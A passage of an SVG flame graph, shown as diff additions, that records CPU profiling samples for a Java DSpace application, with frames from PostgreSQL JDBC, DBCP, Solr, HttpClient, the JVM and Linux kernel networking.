+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="422.7" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="425.68" y="879.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="421.6" y="629" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="424.60" y="639.5" ></text>
+</g>
+<g >
+<title>acpi_os_read_port (1 samples, 0.09%)</title><rect x="421.6" y="517" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="527.5" ></text>
+</g>
+<g >
+<title>ipv4_dst_check (1 samples, 0.09%)</title><rect x="134.7" y="1093" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="137.66" y="1103.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="569.9" y="917" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="572.91" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (3 samples, 0.27%)</title><rect x="715.0" y="805" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="717.99" y="815.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (1 samples, 0.09%)</title><rect x="134.7" y="1141" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="137.66" y="1151.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getID (1 samples, 0.09%)</title><rect x="620.4" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="623.42" y="943.5" ></text>
+</g>
+<g >
+<title>set_task_cpu (1 samples, 0.09%)</title><rect x="257.2" y="629" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="260.18" y="639.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="423.8" y="901" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="426.75" y="911.5" ></text>
+</g>
+<g >
+<title>handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="137.9" y="1141" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="140.89" y="1151.5" ></text>
+</g>
+<g >
+<title>do_futex (61 samples, 5.56%)</title><rect x="13.2" y="1237" width="65.6" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="16.22" y="1247.5" >do_futex</text>
+</g>
+<g >
+<title>java/util/ArrayList:::contains (1 samples, 0.09%)</title><rect x="588.2" y="965" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="591.18" y="975.5" ></text>
+</g>
+<g >
+<title>bbr_lt_bw_sampling.isra.0 (2 samples, 0.18%)</title><rect x="277.6" y="709" width="2.1" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="280.60" y="719.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (3 samples, 0.27%)</title><rect x="409.8" y="821" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="412.78" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="884.8" y="901" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="911.5" ></text>
+</g>
+<g >
+<title>java/net/URI$Parser:::at (1 samples, 0.09%)</title><rect x="424.8" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="427.83" y="911.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.09%)</title><rect x="634.4" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="637.39" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (15 samples, 1.37%)</title><rect x="1017.0" y="965" width="16.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1019.98" y="975.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (3 samples, 0.27%)</title><rect x="543.0" y="693" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="546.04" y="703.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="884.8" y="773" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="887.79" y="783.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1121.2" y="933" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.09%)</title><rect x="873.0" y="837" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (6 samples, 0.55%)</title><rect x="1034.2" y="917" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1037.17" y="927.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (12 samples, 1.09%)</title><rect x="117.5" y="1077" width="12.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="120.47" y="1087.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (4 samples, 0.36%)</title><rect x="916.0" y="805" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="918.96" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (10 samples, 0.91%)</title><rect x="1143.8" y="981" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1146.79" y="991.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="850.4" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="853.40" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1098.7" y="789" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1101.65" y="799.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.18%)</title><rect x="1024.5" y="789" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1027.50" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::error (10 samples, 0.91%)</title><rect x="409.8" y="917" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="412.78" y="927.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (1 samples, 0.09%)</title><rect x="1078.2" y="581" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="591.5" ></text>
+</g>
+<g >
+<title>org/apache/http/conn/routing/HttpRoute:::equals (1 samples, 0.09%)</title><rect x="1070.7" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1073.71" y="943.5" ></text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (1 samples, 0.09%)</title><rect x="1083.6" y="821" width="1.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1086.61" y="831.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/PluginManager:::getNamedPlugin (4 samples, 0.36%)</title><rect x="723.6" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="726.59" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1093" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1103.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="1163.1" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1166.13" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="837.5" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="840.50" y="895.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="709.6" y="853" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="712.62" y="863.5" ></text>
+</g>
+<g >
+<title>Java_java_io_FileOutputStream_writeBytes (3 samples, 0.27%)</title><rect x="409.8" y="805" width="3.2" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="412.78" y="815.5" ></text>
+</g>
+<g >
+<title>ip_finish_output (109 samples, 9.93%)</title><rect x="227.1" y="1045" width="117.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="230.09" y="1055.5" >ip_finish_output</text>
+</g>
+<g >
+<title>do_syscall_64 (3 samples, 0.27%)</title><rect x="409.8" y="741" width="3.2" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="412.78" y="751.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.36%)</title><rect x="884.8" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="877.3" y="885" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="880.27" y="895.5" ></text>
+</g>
+<g >
+<title>I2C/C2I adapters (2 samples, 0.18%)</title><rect x="372.2" y="1013" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="375.17" y="1023.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (1 samples, 0.09%)</title><rect x="212.0" y="1013" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="215.04" y="1023.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="835.4" y="901" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="838.36" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestAddCookies:::process (2 samples, 0.18%)</title><rect x="1112.6" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1115.62" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.09%)</title><rect x="554.9" y="869" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="557.86" y="879.5" ></text>
+</g>
+<g >
+<title>__x64_sys_poll (3 samples, 0.27%)</title><rect x="1109.4" y="821" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1112.40" y="831.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.09%)</title><rect x="302.3" y="821" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="305.31" y="831.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="827.8" y="773" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="830.83" y="783.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (61 samples, 5.56%)</title><rect x="13.2" y="1253" width="65.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.22" y="1263.5" >__x64_s..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="761.2" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.20" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="739.7" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="742.71" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%)</title><rect x="1168.5" y="933" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1171.51" y="943.5" ></text>
+</g>
+<g >
+<title>__hrtimer_init (1 samples, 0.09%)</title><rect x="547.3" y="677" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="550.34" y="687.5" ></text>
+</g>
+<g >
+<title>default_wake_function (1 samples, 0.09%)</title><rect x="137.9" y="693" width="1.1" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="140.89" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Single:::isSatisfiedBy (1 samples, 0.09%)</title><rect x="718.2" y="853" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="721.21" y="863.5" ></text>
+</g>
+<g >
+<title>ip_local_out (1 samples, 0.09%)</title><rect x="1078.2" y="549" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="559.5" ></text>
+</g>
+<g >
+<title>poll_schedule_timeout.constprop.0 (6 samples, 0.55%)</title><rect x="547.3" y="741" width="6.5" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="550.34" y="751.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Ques:::study (1 samples, 0.09%)</title><rect x="922.4" y="693" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="925.40" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="804.2" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.19" y="911.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="220.6" y="981" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="223.64" y="991.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="540.9" y="757" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="543.89" y="767.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (10 samples, 0.91%)</title><rect x="852.6" y="901" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="855.55" y="911.5" ></text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.09%)</title><rect x="631.2" y="805" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="634.17" y="815.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%)</title><rect x="833.2" y="853" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="836.21" y="863.5" ></text>
+</g>
+<g >
+<title>unlock_buffer (1 samples, 0.09%)</title><rect x="137.9" y="821" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="140.89" y="831.5" ></text>
+</g>
+<g >
+<title>perf_event_update_userpage (1 samples, 0.09%)</title><rect x="1111.5" y="565" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1114.55" y="575.5" ></text>
+</g>
+<g >
+<title>enqueue_task_fair (3 samples, 0.27%)</title><rect x="260.4" y="597" width="3.2" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="263.40" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingConnection:::commit (2 samples, 0.18%)</title><rect x="1172.8" y="981" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1175.81" y="991.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (13 samples, 1.18%)</title><rect x="1176.0" y="1253" width="14.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1179.03" y="1263.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="820.3" y="917" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="927.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (1 samples, 0.09%)</title><rect x="249.7" y="677" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="252.65" y="687.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (60 samples, 5.46%)</title><rect x="13.2" y="1077" width="64.5" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="16.22" y="1087.5" >__intel..</text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.09%)</title><rect x="1079.3" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1082.31" y="911.5" ></text>
+</g>
+<g >
+<title>do_sys_open (1 samples, 0.09%)</title><rect x="11.1" y="1237" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="14.07" y="1247.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory:::getFactory (27 samples, 2.46%)</title><rect x="635.5" y="885" width="29.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="638.46" y="895.5" >or..</text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 0.55%)</title><rect x="1093.3" y="837" width="6.4" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1096.28" y="847.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (5 samples, 0.46%)</title><rect x="1035.2" y="901" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1038.25" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1155.6" y="949" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1158.61" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (54 samples, 4.92%)</title><rect x="1062.1" y="965" width="58.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1065.11" y="975.5" >org/ap..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="783.8" y="901" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="786.77" y="911.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (2 samples, 0.18%)</title><rect x="716.1" y="725" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="719.07" y="735.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.18%)</title><rect x="855.8" y="741" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="858.77" y="751.5" ></text>
+</g>
+<g >
+<title>__memmove_avx_unaligned_erms (1 samples, 0.09%)</title><rect x="1025.6" y="773" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1028.57" y="783.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%)</title><rect x="1157.8" y="885" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (1 samples, 0.09%)</title><rect x="849.3" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="852.33" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="1153.5" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.46" y="943.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="630.1" y="885" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="633.09" y="895.5" ></text>
+</g>
+<g >
+<title>handle_fasteoi_irq (1 samples, 0.09%)</title><rect x="790.2" y="757" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="793.22" y="767.5" ></text>
+</g>
+<g >
+<title>acpi_ev_detect_gpe (1 samples, 0.09%)</title><rect x="790.2" y="645" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="655.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="177.7" y="1109" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="180.65" y="1119.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.36%)</title><rect x="748.3" y="949" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="751.31" y="959.5" ></text>
+</g>
+<g >
+<title>__tcp_ack_snd_check (1 samples, 0.09%)</title><rect x="249.7" y="741" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="252.65" y="751.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="436.6" y="805" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="439.65" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="740.8" y="869" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="879.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="1155.6" y="965" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1158.61" y="975.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.18%)</title><rect x="1024.5" y="821" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1027.50" y="831.5" ></text>
+</g>
+<g >
+<title>memset_erms (1 samples, 0.09%)</title><rect x="189.5" y="1141" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="192.47" y="1151.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.09%)</title><rect x="876.2" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="879.19" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1069.6" y="917" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1072.64" y="927.5" ></text>
+</g>
+<g >
+<title>skb_release_data (1 samples, 0.09%)</title><rect x="285.1" y="677" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="288.12" y="687.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_unlock_usercnt (1 samples, 0.09%)</title><rect x="827.8" y="757" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="830.83" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.09%)</title><rect x="616.1" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="619.12" y="959.5" ></text>
+</g>
+<g >
+<title>nf_ct_seq_offset (1 samples, 0.09%)</title><rect x="1078.2" y="37" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="47.5" ></text>
+</g>
+<g >
+<title>irq_enter (1 samples, 0.09%)</title><rect x="77.7" y="1109" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="80.70" y="1119.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::decode (1 samples, 0.09%)</title><rect x="807.4" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="810.41" y="895.5" ></text>
+</g>
+<g >
+<title>ext4_dirty_inode (2 samples, 0.18%)</title><rect x="409.8" y="565" width="2.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="412.78" y="575.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractCollection:::toArray (1 samples, 0.09%)</title><rect x="892.3" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="895.31" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="540.9" y="773" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="543.89" y="783.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.27%)</title><rect x="735.4" y="837" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="847.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="792.4" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.37" y="927.5" ></text>
+</g>
+<g >
+<title>ext4_inode_table (1 samples, 0.09%)</title><rect x="410.9" y="517" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="413.86" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getDelegate (52 samples, 4.74%)</title><rect x="467.8" y="901" width="55.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="470.81" y="911.5" >org/a..</text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.09%)</title><rect x="906.3" y="837" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="909.28" y="847.5" ></text>
+</g>
+<g >
+<title>Java_java_net_PlainSocketImpl_socketConnect (1 samples, 0.09%)</title><rect x="1078.2" y="773" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1081.23" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestContent:::process (1 samples, 0.09%)</title><rect x="463.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="466.52" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (31 samples, 2.82%)</title><rect x="425.9" y="853" width="33.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="428.90" y="863.5" >or..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="748.3" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="751.31" y="879.5" ></text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (2 samples, 0.18%)</title><rect x="1075.0" y="917" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1078.01" y="927.5" ></text>
+</g>
+<g >
+<title>__memmove_avx_unaligned_erms (1 samples, 0.09%)</title><rect x="537.7" y="757" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="540.67" y="767.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="460.3" y="869" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="463.29" y="879.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Proxy:::newProxyInstance (1 samples, 0.09%)</title><rect x="532.3" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="535.30" y="911.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_tcp_packet (1 samples, 0.09%)</title><rect x="1078.2" y="53" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="63.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (8 samples, 0.73%)</title><rect x="1100.8" y="853" width="8.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1103.80" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::clearParameters (1 samples, 0.09%)</title><rect x="1040.6" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
